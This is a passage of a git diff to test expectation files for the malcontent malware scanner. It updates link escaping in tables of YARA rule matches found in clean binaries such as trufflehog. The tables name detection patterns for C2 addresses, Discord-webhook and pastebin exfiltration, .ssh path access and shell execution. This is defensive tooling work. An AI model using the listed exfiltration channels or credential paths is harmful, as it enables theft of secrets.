[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https%3A%2F%2Ftree-sitter.github.io%2Ftree-sitter%2Fassets%2Fimages%2Ffavicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https%3A%2F%2Ftree-sitter.github.io%2Ftree-sitter%2Fassets%2Fjs%2Fplayground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https%3A%2F%2Ftree-sitter.github.io%2Ftree-sitter%2Fassets%2Fschemas%2Fgrammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https%3A%2F%2Ftree-sitter.github.io%2Ftree-sitter%2Fsyntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https%3A%2F%2Ftree-sitter.github.io%2Ftree-sitter%2Fcreating-parsers)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https%3A%2F%2Ftree-sitter.github.io%2Ftree-sitter%2Fusing-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https%3A%2F%2Ftree-sitter.github.io%2Ftree-sitter%2Fplayground)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https%3A%2F%2Ftree-sitter.github.io%2Ftree-sitter.wasmhttps)
[https://github.com/tree-sitter/tree-sitter-Failed](https%3A%2F%2Fgithub.com%2Ftree-sitter%2Ftree-sitter-Failed)
[https://tree-sitter.github.io/tree-sitter.jshttps](https%3A%2F%2Ftree-sitter.github.io%2Ftree-sitter.jshttps)
[https://code.jquery.com/jquery-3.3.1.min.js](https%3A%2F%2Fcode.jquery.com%2Fjquery-3.3.1.min.js)
[https://github.com/ChimeHQ/SwiftTreeSitter](https%3A%2F%2Fgithub.com%2FChimeHQ%2FSwiftTreeSitter)
[https://docs.rs/tree-sitter-language/](https%3A%2F%2Fdocs.rs%2Ftree-sitter-language%2F)
[https://docs.rs/tree-sitter/](https%3A%2F%2Fdocs.rs%2Ftree-sitter%2F)
[https://docs.rs/getrandom](https%3A%2F%2Fdocs.rs%2Fgetrandom)
[https://gitlab.com/https](https%3A%2F%2Fgitlab.com%2Fhttps)
[https://parser.cparser.h](https%3A%2F%2Fparser.cparser.h) | | LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#getenv) | Retrieve environment variables | [getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) | +| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write\(output\)](https://github.com/search?q=stdout.write%28output%29&type=code) | | LOW | [privesc/setuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/setuid.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | | LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) | | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md index 74b413627..65de9a7ab 100644 --- a/tests/linux/clean/trufflehog.md +++ b/tests/linux/clean/trufflehog.md @@ -6,7 +6,7 @@ | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [anti-static/obfuscation/syscall](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/syscall.yara#go_raw_syscall) | invokes raw system calls | [unix.RawSyscall](https://github.com/search?q=unix.RawSyscall&type=code) | | MEDIUM | [c2/addr/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/discord.yara#discord) | may report back to 'Discord' | [Discord](https://github.com/search?q=Discord&type=code) | -| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR](https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR)
[http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba](http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba)
[https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx](https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx)
[https://%s/api/v1/users/meopsgenie.com/alert/detail/https](https://%s/api/v1/users/meopsgenie.com/alert/detail/https)
[https://%s.kanbantool.com/api/v3/users/current.jsonhttps](https://%s.kanbantool.com/api/v3/users/current.jsonhttps)
[https://%s.flowlu.com/api/v1/module/crm/lead/list](https://%s.flowlu.com/api/v1/module/crm/lead/list)
[https://%s.billomat.net/api/v2/clients/myself](https://%s.billomat.net/api/v2/clients/myself)
[https://%s.fibery.io/api/commandsTruffleHog3](https://%s.fibery.io/api/commandsTruffleHog3)
[https://%s.salesmate.io/apis/v3/companies/1](https://%s.salesmate.io/apis/v3/companies/1)
[https://%s.scalr.io/api/iacp/v3/agentshttps](https://%s.scalr.io/api/iacp/v3/agentshttps)
[https://%s.vouchery.io/api/v2.0/usershttps](https://%s.vouchery.io/api/v2.0/usershttps)
[https://%s.api.mailchimp.com/3.0/https](https://%s.api.mailchimp.com/3.0/https)
[https://%s.caspio.com/oauth/tokenhttps](https://%s.caspio.com/oauth/tokenhttps)
[https://%s.leankit.com/io/accounthttps](https://%s.leankit.com/io/accounthttps)
[https://%s.api.mailchimp.com/3.0https](https://%s.api.mailchimp.com/3.0https)
[https://%s/api/v3/users/current.json](https://%s/api/v3/users/current.json)
[https://%s/auth/oauth2/v2/tokenhttps](https://%s/auth/oauth2/v2/tokenhttps)
[https://%s/v2/lastUpdateTimeBeamer](https://%s/v2/lastUpdateTimeBeamer)
[https://%s.formsite.com/api/v2/](https://%s.formsite.com/api/v2/)
[https://%s.currencycloud.com](https://%s.currencycloud.com)
[https://%s/api/v1/userserror](https://%s/api/v1/userserror)
[https://%s/api/v1/projects](https://%s/api/v1/projects)
[https://%s/admin/api/2024](https://%s/admin/api/2024)
[https://%s/api/v1/sources](https://%s/api/v1/sources)
[https://%s/api/v2/tickets](https://%s/api/v2/tickets)
[https://%s/api/laml/2010](https://%s/api/laml/2010)
[https://%s/invoices.json](https://%s/invoices.json)
[https://%s/account.json](https://%s/account.json)
[https://%sSCRAM](https://%sSCRAM)
[https://%s.s3](https://%s.s3) | +| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR](https%3A%2F%2F%25s%2Fadmin%2Foauth%2Faccess_scopes.jsonadmin.conversations.removeCustomR)
[http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba](http%3A%2F%2F%25sIncrementDecrementN1QLQueryGetRandom%2Fapi%2FpingrangeScanObserveVba)
[https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx](https%3A%2F%2F%25s%2Fapi%2Fv1%2Fme20060102T150405Z0700InvalidClientTokenIdx)
[https://%s/api/v1/users/meopsgenie.com/alert/detail/https](https%3A%2F%2F%25s%2Fapi%2Fv1%2Fusers%2Fmeopsgenie.com%2Falert%2Fdetail%2Fhttps)
[https://%s.kanbantool.com/api/v3/users/current.jsonhttps](https%3A%2F%2F%25s.kanbantool.com%2Fapi%2Fv3%2Fusers%2Fcurrent.jsonhttps)
[https://%s.flowlu.com/api/v1/module/crm/lead/list](https%3A%2F%2F%25s.flowlu.com%2Fapi%2Fv1%2Fmodule%2Fcrm%2Flead%2Flist)
[https://%s.billomat.net/api/v2/clients/myself](https%3A%2F%2F%25s.billomat.net%2Fapi%2Fv2%2Fclients%2Fmyself)
[https://%s.fibery.io/api/commandsTruffleHog3](https%3A%2F%2F%25s.fibery.io%2Fapi%2FcommandsTruffleHog3)
[https://%s.salesmate.io/apis/v3/companies/1](https%3A%2F%2F%25s.salesmate.io%2Fapis%2Fv3%2Fcompanies%2F1)
[https://%s.scalr.io/api/iacp/v3/agentshttps](https%3A%2F%2F%25s.scalr.io%2Fapi%2Fiacp%2Fv3%2Fagentshttps)
[https://%s.vouchery.io/api/v2.0/usershttps](https%3A%2F%2F%25s.vouchery.io%2Fapi%2Fv2.0%2Fusershttps)
[https://%s.api.mailchimp.com/3.0/https](https%3A%2F%2F%25s.api.mailchimp.com%2F3.0%2Fhttps)
[https://%s.caspio.com/oauth/tokenhttps](https%3A%2F%2F%25s.caspio.com%2Foauth%2Ftokenhttps)
[https://%s.leankit.com/io/accounthttps](https%3A%2F%2F%25s.leankit.com%2Fio%2Faccounthttps)
[https://%s.api.mailchimp.com/3.0https](https%3A%2F%2F%25s.api.mailchimp.com%2F3.0https)
[https://%s/api/v3/users/current.json](https%3A%2F%2F%25s%2Fapi%2Fv3%2Fusers%2Fcurrent.json)
[https://%s/auth/oauth2/v2/tokenhttps](https%3A%2F%2F%25s%2Fauth%2Foauth2%2Fv2%2Ftokenhttps)
[https://%s/v2/lastUpdateTimeBeamer](https%3A%2F%2F%25s%2Fv2%2FlastUpdateTimeBeamer)
[https://%s.formsite.com/api/v2/](https%3A%2F%2F%25s.formsite.com%2Fapi%2Fv2%2F)
[https://%s.currencycloud.com](https%3A%2F%2F%25s.currencycloud.com)
[https://%s/api/v1/userserror](https%3A%2F%2F%25s%2Fapi%2Fv1%2Fuserserror)
[https://%s/api/v1/projects](https%3A%2F%2F%25s%2Fapi%2Fv1%2Fprojects)
[https://%s/admin/api/2024](https%3A%2F%2F%25s%2Fadmin%2Fapi%2F2024)
[https://%s/api/v1/sources](https%3A%2F%2F%25s%2Fapi%2Fv1%2Fsources)
[https://%s/api/v2/tickets](https%3A%2F%2F%25s%2Fapi%2Fv2%2Ftickets)
[https://%s/api/laml/2010](https%3A%2F%2F%25s%2Fapi%2Flaml%2F2010)
[https://%s/invoices.json](https%3A%2F%2F%25s%2Finvoices.json)
[https://%s/account.json](https%3A%2F%2F%25s%2Faccount.json)
[https://%sSCRAM](https%3A%2F%2F%25sSCRAM)
[https://%s.s3](https%3A%2F%2F%25s.s3) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [announce_port](https://github.com/search?q=announce_port&type=code)
[allowed_port](https://github.com/search?q=allowed_port&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[firewall_ip](https://github.com/search?q=firewall_ip&type=code)
[accel_port](https://github.com/search?q=accel_port&type=code)
[lookupPort](https://github.com/search?q=lookupPort&type=code)
[relay_port](https://github.com/search?q=relay_port&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[routedPort](https://github.com/search?q=routedPort&type=code)
[snmpd_port](https://github.com/search?q=snmpd_port&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[fastly_ip](https://github.com/search?q=fastly_ip&type=code)
[htcp_port](https://github.com/search?q=htcp_port&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[miss_port](https://github.com/search?q=miss_port&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[parsePort](https://github.com/search?q=parsePort&type=code)
[privateIp](https://github.com/search?q=privateIp&type=code)
[snmp_port](https://github.com/search?q=snmp_port&type=code)
[stripPort](https://github.com/search?q=stripPort&type=code)
[icp_port](https://github.com/search?q=icp_port&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[pages_ip](https://github.com/search?q=pages_ip&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[ip_port](https://github.com/search?q=ip_port&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[geo_ip](https://github.com/search?q=geo_ip&type=code)
[old_ip](https://github.com/search?q=old_ip&type=code)
[in_ip](https://github.com/search?q=in_ip&type=code)
[a_ip](https://github.com/search?q=a_ip&type=code)
[i_ip](https://github.com/search?q=i_ip&type=code)
[m_ip](https://github.com/search?q=m_ip&type=code)
[aIp](https://github.com/search?q=aIp&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[nIp](https://github.com/search?q=nIp&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[tIp](https://github.com/search?q=tIp&type=code)
[vIp](https://github.com/search?q=vIp&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [ConnectServer](https://github.com/search?q=ConnectServer&type=code) | | MEDIUM | [c2/addr/telegram](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/telegram.yara#telegram) | telegram | [telegram.org](https://github.com/search?q=telegram.org&type=code)
[Telegram](https://github.com/search?q=Telegram&type=code) | @@ -15,7 +15,7 @@ | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#download_ref) | downloads files | [download file](https://github.com/search?q=download+file&type=code) | | MEDIUM | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.com/api/api_post](https://github.com/search?q=pastebin.com%2Fapi%2Fapi_post&type=code)
[pastebin.Scanner](https://github.com/search?q=pastebin.Scanner&type=code)
[pastebin.init](https://github.com/search?q=pastebin.init&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code) | | MEDIUM | [c2/tool_transfer/grayware](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/grayware.yara#shodan_io) | References shodan.io | [shodan.io](https://github.com/search?q=shodan.io&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code)
[Darwin](https://github.com/search?q=Darwin&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macos](https://github.com/search?q=macos&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https%3A%2F%2F)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http%3A%2F%2F)
[windows](https://github.com/search?q=windows&type=code)
[Darwin](https://github.com/search?q=Darwin&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macos](https://github.com/search?q=macos&type=code) | | MEDIUM | [collect/archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/unarchive.yara#unarchive) | unarchives files | [unarchiveapp_configurations](https://github.com/search?q=unarchiveapp_configurations&type=code)
[UnarchiveProject](https://github.com/search?q=UnarchiveProject&type=code)
[unarchiveadmin](https://github.com/search?q=unarchiveadmin&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code) | | MEDIUM | [collect/databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) | @@ -44,7 +44,7 @@ | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path) | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.ssh](https://github.com/search?q=%25s%2F.ssh&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [runShellCommandAsynchronously](https://github.com/search?q=runShellCommandAsynchronously&type=code)
[Execute_Command_Line](https://github.com/search?q=Execute_Command_Line&type=code)
[StartCommandOptions](https://github.com/search?q=StartCommandOptions&type=code)
[MergeRunCmdOptions](https://github.com/search?q=MergeRunCmdOptions&type=code)
[processRunCommand](https://github.com/search?q=processRunCommand&type=code)
[RunCommandCursor](https://github.com/search?q=RunCommandCursor&type=code)
[executeCommand](https://github.com/search?q=executeCommand&type=code)
[StartCmdTrace](https://github.com/search?q=StartCmdTrace&type=code)
[execTxCommand](https://github.com/search?q=execTxCommand&type=code)
[runGitCommand](https://github.com/search?q=runGitCommand&type=code)
[ExecCommand](https://github.com/search?q=ExecCommand&type=code) | | MEDIUM | [exec/cmd/pipe](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen_go) | [launches program and reads its output](https://linux.die.net/man/3/popen) | [CombinedOutput](https://github.com/search?q=CombinedOutput&type=code)
[exec](https://github.com/search?q=exec&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run) | executes external programs | [).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.(*Cmd).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run) | executes external programs | [\).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.\(*Cmd\).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) | | MEDIUM | [exec/script/osa](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/script/osascript.yara#osascript_caller) | runs osascript | [display dialog](https://github.com/search?q=display+dialog&type=code) | | MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | runs powershell scripts | [powershell](https://github.com/search?q=powershell&type=code) | | MEDIUM | [exfil/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/discord.yara#discord_bot) | Uses the Discord webhooks API | [discord.com/api/webhooks/](https://github.com/search?q=discord.com%2Fapi%2Fwebhooks%2F&type=code) | @@ -72,7 +72,7 @@ | MEDIUM | [net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_binary) | accepts binary files via HTTP | [application/octet-stream](https://github.com/search?q=application%2Foctet-stream&type=code)
[Accept](https://github.com/search?q=Accept&type=code) | | MEDIUM | [net/http/content_length](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/content-length.yara#content_length_0) | Sets HTTP content length to zero | [Content-Length: 0](https://github.com/search?q=Content-Length%3A+0&type=code) | | MEDIUM | [net/http/cookies](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/cookies.yara#http_cookie) | [access HTTP resources using cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) | [Cookie](https://github.com/search?q=Cookie&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code) | -| MEDIUM | [net/http/fake_user_agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/fake-user-agent.yara#fake_user_agent_chrome) | pretends to be Chrome | [(KHTML, like Gecko) Chrome](https://github.com/search?q=%28KHTML%2C+like+Gecko%29+Chrome&type=code) | +| MEDIUM | [net/http/fake_user_agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/fake-user-agent.yara#fake_user_agent_chrome) | pretends to be Chrome | [\(KHTML, like Gecko\) Chrome](https://github.com/search?q=%28KHTML%2C+like+Gecko%29+Chrome&type=code) | | MEDIUM | [net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload) | upload content via HTTP form | [application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[POST](https://github.com/search?q=POST&type=code)
[post](https://github.com/search?q=post&type=code) | | MEDIUM | [net/http/oauth2_google](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/oauth2-google.yara#google_oauth2) | exchanges credentials with Google | [googleapis.com/oauth2/v3/tokeninfo](https://github.com/search?q=googleapis.com%2Foauth2%2Fv3%2Ftokeninfo&type=code)
[accounts.google.com/o/oauth2/auth](https://github.com/search?q=accounts.google.com%2Fo%2Foauth2%2Fauth&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits form content to websites | [Content-Type from get jenkins builds request](https://github.com/search?q=Content-Type+from+get+jenkins+builds+request&type=code)
[Content-Type headerstorage: at least one sou](https://github.com/search?q=Content-Type+headerstorage%3A+at+least+one+sou&type=code)
[Content-TypePUSH_PROMISECONTINUATIONCookie.V](https://github.com/search?q=Content-TypePUSH_PROMISECONTINUATIONCookie.V&type=code)
[Content-Typeinvalid nesting depthcould not p](https://github.com/search?q=Content-Typeinvalid+nesting+depthcould+not+p&type=code)
[Content-Typenet/http: timeout awaiting respo](https://github.com/search?q=Content-Typenet%2Fhttp%3A+timeout+awaiting+respo&type=code)
[Content-Type from get jenkins jobs request:](https://github.com/search?q=Content-Type+from+get+jenkins+jobs+request%3A&type=code)
[Content-Type: text/plain](https://github.com/search?q=Content-Type%3A+text%2Fplain&type=code)
[Content-Type isn](https://github.com/search?q=Content-Type+isn&type=code)
[Content-Typeding](https://github.com/search?q=Content-Typeding&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code) | @@ -89,7 +89,7 @@ | MEDIUM | [net/tcp/connect](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/connect.yara#connect_tcp) | connects to a TCP port | [dialTCP](https://github.com/search?q=dialTCP&type=code) | | MEDIUM | [net/tcp/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/listen.yara#listen_tcp) | listen on a TCP port | [listening on tcp](https://github.com/search?q=listening+on+tcp&type=code) | | MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses crypto/ssh to connect to the SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [-//WcardshillsteamsPhototruthclean.php?saintmetallouismeantproofbriefro](https://github.com/search?q=-%2F%2FWcardshillsteamsPhototruthclean.php%3Fsaintmetallouismeantproofbriefro&type=code)
[25https://api.websitepulse.com/textserver.php?method=GetContacts](https://github.com/search?q=25https%3A%2F%2Fapi.websitepulse.com%2Ftextserver.php%3Fmethod%3DGetContacts&type=code)
[bhttps://api.route4me.com/api.v4/address_book.php?api_key=https](https://github.com/search?q=bhttps%3A%2F%2Fapi.route4me.com%2Fapi.v4%2Faddress_book.php%3Fapi_key%3Dhttps&type=code)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https)
[shttps://api.mesibo.com/api.php?op=useradd](https://github.com/search?q=shttps%3A%2F%2Fapi.mesibo.com%2Fapi.php%3Fop%3Duseradd&type=code)
[https://pastebin.com/api/api_post.php](https://pastebin.com/api/api_post.php)
[ofpluginspage/index.php?remained](https://github.com/search?q=ofpluginspage%2Findex.php%3Fremained&type=code)
[examplepersonallyindex.php?](https://github.com/search?q=examplepersonallyindex.php%3F&type=code) | +| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [-//WcardshillsteamsPhototruthclean.php?saintmetallouismeantproofbriefro](https://github.com/search?q=-%2F%2FWcardshillsteamsPhototruthclean.php%3Fsaintmetallouismeantproofbriefro&type=code)
[25https://api.websitepulse.com/textserver.php?method=GetContacts](https://github.com/search?q=25https%3A%2F%2Fapi.websitepulse.com%2Ftextserver.php%3Fmethod%3DGetContacts&type=code)
[bhttps://api.route4me.com/api.v4/address_book.php?api_key=https](https://github.com/search?q=bhttps%3A%2F%2Fapi.route4me.com%2Fapi.v4%2Faddress_book.php%3Fapi_key%3Dhttps&type=code)
[https://us1.locationiq.com/v1/reverse.php?key=https](https%3A%2F%2Fus1.locationiq.com%2Fv1%2Freverse.php%3Fkey%3Dhttps)
[shttps://api.mesibo.com/api.php?op=useradd](https://github.com/search?q=shttps%3A%2F%2Fapi.mesibo.com%2Fapi.php%3Fop%3Duseradd&type=code)
[https://pastebin.com/api/api_post.php](https%3A%2F%2Fpastebin.com%2Fapi%2Fapi_post.php)
[ofpluginspage/index.php?remained](https://github.com/search?q=ofpluginspage%2Findex.php%3Fremained&type=code)
[examplepersonallyindex.php?](https://github.com/search?q=examplepersonallyindex.php%3F&type=code) | | MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | | MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
[net/url](https://github.com/search?q=net%2Furl&type=code) | | MEDIUM | [persist/kernel_module/unload](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/kernel_module/unload.yara#delete_module) | Unload Linux kernel module | [delete_module](https://github.com/search?q=delete_module&type=code) | @@ -98,8 +98,8 @@ | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercepted](https://github.com/search?q=intercepted&type=code)
[interceptor](https://github.com/search?q=interceptor&type=code) | | MEDIUM | [sus/malicious](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/malicious.yara#malicious) | References 'malicious' | [other kinds of malicious content](https://github.com/search?q=other+kinds+of+malicious+content&type=code) | | LOW | [anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random) | uses a random number generator | [typeES3_S3_NS_26random_access_iterator](https://github.com/search?q=typeES3_S3_NS_26random_access_iterator&type=code)
[typeES4_S4_NS_26random_access_iterator](https://github.com/search?q=typeES4_S4_NS_26random_access_iterator&type=code)
[typeES5_S5_NS_26random_access_iterator](https://github.com/search?q=typeES5_S5_NS_26random_access_iterator&type=code)
[typeES6_S6_NS_26random_access_iterator](https://github.com/search?q=typeES6_S6_NS_26random_access_iterator&type=code)
[typeES9_S9_NS_26random_access_iterator](https://github.com/search?q=typeES9_S9_NS_26random_access_iterator&type=code)
[typeESA_SA_NS_26random_access_iterator](https://github.com/search?q=typeESA_SA_NS_26random_access_iterator&type=code)
[S5_S5_S5_NS_26random_access_iterator](https://github.com/search?q=S5_S5_S5_NS_26random_access_iterator&type=code)
[ifIXsr37__has_random_access_iterator](https://github.com/search?q=ifIXsr37__has_random_access_iterator&type=code)
[RangeScanCreateRandomSamplingConfig](https://github.com/search?q=RangeScanCreateRandomSamplingConfig&type=code)
[typeENS_26random_access_iterator](https://github.com/search?q=typeENS_26random_access_iterator&type=code)
[stateRandomizeSeedfrequency](https://github.com/search?q=stateRandomizeSeedfrequency&type=code)
[APPENDexecutableRandomized](https://github.com/search?q=APPENDexecutableRandomized&type=code)
[LazyRandomAccessCollection](https://github.com/search?q=LazyRandomAccessCollection&type=code)
[ReverseRandomAccessIndex](https://github.com/search?q=ReverseRandomAccessIndex&type=code)
[_RandomAccessIndexType](https://github.com/search?q=_RandomAccessIndexType&type=code)
[RandomATRIDForVbucket](https://github.com/search?q=RandomATRIDForVbucket&type=code)
[_RandomAccessIterator](https://github.com/search?q=_RandomAccessIterator&type=code)
[chooseRandomFromRange](https://github.com/search?q=chooseRandomFromRange&type=code)
[randomSampleDistance](https://github.com/search?q=randomSampleDistance&type=code)
[NewRandomFromReader](https://github.com/search?q=NewRandomFromReader&type=code)
[RandomScoreFunction](https://github.com/search?q=RandomScoreFunction&type=code)
[randomSampleCommand](https://github.com/search?q=randomSampleCommand&type=code)
[randomSampleLiteral](https://github.com/search?q=randomSampleLiteral&type=code)
[randomscorefunction](https://github.com/search?q=randomscorefunction&type=code)
[selection_ga_random](https://github.com/search?q=selection_ga_random&type=code)
[nonZeroRandomBytes](https://github.com/search?q=nonZeroRandomBytes&type=code)
[GetRandomCallback](https://github.com/search?q=GetRandomCallback&type=code)
[newRandomFromPool](https://github.com/search?q=newRandomFromPool&type=code)
[GetRandomOptions](https://github.com/search?q=GetRandomOptions&type=code)
[readRandomUint32](https://github.com/search?q=readRandomUint32&type=code)
[GetRandomResult](https://github.com/search?q=GetRandomResult&type=code)
[rand_getrandom](https://github.com/search?q=rand_getrandom&type=code)
[randomBoundary](https://github.com/search?q=randomBoundary&type=code)
[randomEndpoint](https://github.com/search?q=randomEndpoint&type=code)
